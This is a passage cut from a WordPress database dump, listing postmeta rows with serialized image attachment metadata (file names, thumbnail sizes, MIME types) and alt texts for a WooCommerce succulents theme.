png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-768x487.png\";s:5:\"width\";i:768;s:6:\"height\";i:487;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-550x506.png\";s:5:\"width\";i:550;s:6:\"height\";i:506;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-550x506.png\";s:5:\"width\";i:550;s:6:\"height\";i:506;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-600x380.png\";s:5:\"width\";i:600;s:6:\"height\";i:380;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h3-slide3-graphic-4-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1068,4250,'_wp_attached_file','2018/01/h8-background-img-1.jpg'),(1069,4250,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1380;s:4:\"file\";s:31:\"2018/01/h8-background-img-1.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h8-background-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-600x431.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:431;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-300x216.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"h8-background-img-1-1024x736.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:736;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-768x552.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:552;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1536x1104.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1104;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h8-background-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"h8-background-img-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h8-background-img-1-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:33:\"h8-background-img-1-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1070,4251,'_wp_attached_file','2018/01/product8-gallery2.jpg'),(1071,4251,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product8-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product8-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product8-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product8-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product8-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product8-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product8-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product8-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product8-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product8-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product8-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product8-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1072,245,'_wp_attached_file','2018/01/h1-img15.jpg'),(1073,245,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1100;s:4:\"file\";s:20:\"2018/01/h1-img15.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h1-img15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h1-img15-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h1-img15-300x172.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:172;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"h1-img15-1024x587.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:587;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h1-img15-768x440.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:440;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h1-img15-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h1-img15-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:21:\"h1-img15-1536x880.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:880;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h1-img15-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"h1-img15-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h1-img15-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:22:\"h1-img15-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h1-img15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h1-img15-600x344.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:344;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h1-img15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1074,1554,'_wp_attachment_image_alt','a'),(1075,1560,'_wp_attached_file','2018/01/h7-img-11.jpg'),(1076,1560,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:500;s:4:\"file\";s:21:\"2018/01/h7-img-11.jpg\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h7-img-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h7-img-11-300x250.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h7-img-11-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h7-img-11-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"h7-img-11-550x500.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"h7-img-11-550x500.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h7-img-11-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-11-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1077,3526,'_wp_attachment_image_alt','a'),(1078,3531,'_wp_attachment_image_alt','a'),(1079,4251,'_wp_attachment_image_alt','a'),(1080,3536,'_wp_attached_file','2018/02/animation-holder-2.png'),(1081,3536,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:214;s:6:\"height\";i:122;s:4:\"file\";s:30:\"2018/02/animation-holder-2.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"animation-holder-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"animation-holder-2-150x122.png\";s:5:\"width\";i:150;s:6:\"height\";i:122;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"animation-holder-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1082,1195,'_wp_attachment_image_alt','a'),(1083,1196,'_wp_attached_file','2018/01/product8-gallery3.jpg'),(1084,1196,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product8-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product8-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product8-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product8-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product8-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product8-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product8-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product8-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product8-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product8-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product8-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product8-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1085,4252,'_wp_attached_file','2018/01/product8-gallery3-1.jpg'),(1086,4252,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:31:\"2018/01/product8-gallery3-1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"product8-gallery3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"product8-gallery3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"product8-gallery3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"product8-gallery3-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"product8-gallery3-1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"product8-gallery3-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"product8-gallery3-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:31:\"product8-gallery3-1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"product8-gallery3-1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"product8-gallery3-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"product8-gallery3-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1087,3536,'_wp_attachment_image_alt','a'),(1088,1560,'_wp_attachment_image_alt','a'),(1089,3546,'_wp_attached_file','2018/02/landing-cimet-img-7.png'),(1090,3546,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:186;s:6:\"height\";i:394;s:4:\"file\";s:31:\"2018/02/landing-cimet-img-7.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-cimet-img-7-186x300.png\";s:5:\"width\";i:186;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-cimet-img-7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-cimet-img-7-142x300.png\";s:5:\"width\";i:142;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-cimet-img-7-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"landing-cimet-img-7-186x300.png\";s:5:\"width\";i:186;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"landing-cimet-img-7-186x240.png\";s:5:\"width\";i:186;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"landing-cimet-img-7-186x300.png\";s:5:\"width\";i:186;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-cimet-img-7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1091,1565,'_wp_attached_file','2018/01/h7-img-12.jpg'),(1092,1565,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:346;s:6:\"height\";i:518;s:4:\"file\";s:21:\"2018/01/h7-img-12.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"h7-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"h7-img-12-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:21:\"h7-img-12-346x300.jpg\";s:5:\"width\";i:346;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:21:\"h7-img-12-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"h7-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"h7-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1093,3278,'_wp_attachment_image_alt','o'),(1094,3279,'_wp_attachment_image_alt',''),(1095,3531,'_wp_attachment_image_alt','a'),(1096